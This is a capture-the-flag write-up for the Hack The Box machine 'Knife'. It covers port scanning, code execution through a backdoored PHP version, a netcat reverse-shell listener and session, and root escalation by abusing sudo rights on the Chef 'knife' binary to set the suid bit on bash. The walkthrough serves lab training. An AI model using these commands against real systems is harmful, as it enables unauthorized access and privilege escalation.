Hack The Box - Knife

Posted on | In

info_card

Knife is an easy rated machine on HackTheBox by MrKN16H. For the user part we will abuse a backdoored php version and for root sudo rights on the Chef Workstation binary knife.

User

Nmap

As usual we start our enumeration off with an nmap scan against all ports, followed by a script and version detection scan against the open ones.

All ports

1
2
3
4
5
6
7
8
9
10
 
$ sudo nmap -p- -T4  10.129.136.243
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 20:09 UTC
Nmap scan report for knife.htb (10.129.136.243)
Host is up (0.034s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http

Nmap done: 1 IP address (1 host up) scanned in 1311.09 seconds

Script and version

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 
$ sudo nmap -sC -sV -p 22,80 10.129.136.243
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 20:33 UTC
Nmap scan report for knife.htb (10.129.136.243)
Host is up (0.033s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds

Php Zerodium

Looking at a request in burp we can see that the the server is powered by php. Checking for the recent php backdoor we can see that it is indeed present on this system adding the required header in burp and calling the id command.

zerodium_poc

Having code execution on the server we can send a reverse shell in the next step. First we set up a listener.

1
2
3
4
 
$ nc -lnvp 7575
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575

Afterwards we send the reverse shell and upgrade it.

zerodium_revshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
$ nc -lnvp 7575
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.136.243.
Ncat: Connection from 10.129.136.243:43786.
bash: cannot set terminal process group (884): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ export TERM=xterm
export TERM=xterm
james@knife:/$ ^Z
[1]+  Stopped                 nc -lnvp 7575
$ stty raw -echo;fg
nc -lnvp 7575

james@knife:/$

We can now read the user flag.

1
2
 
$ wc -c /home/james/user.txt
33 /home/james/user.txt

Root

Chef workstation

On a first glance, we can see that the user james can run the command knife as root.

1
2
3
4
5
6
7
 
james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

This belongs to chef-workstation, a remote management tool.

1
2
 
james@knife:~$ ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7 11:03 /usr/bin/knife -> /opt/chef-workstation/bin/knife

With this we can execute commands as the root user on the system and get to root easily by setting the suid bit on bash.

1
2
3
 
james@knife:~$ sudo /usr/bin/knife exec -E 'exec "chmod +s /bin/bash"'; bash -p
bash-5.0# wc -c /root/root.txt
33 /root/root.txt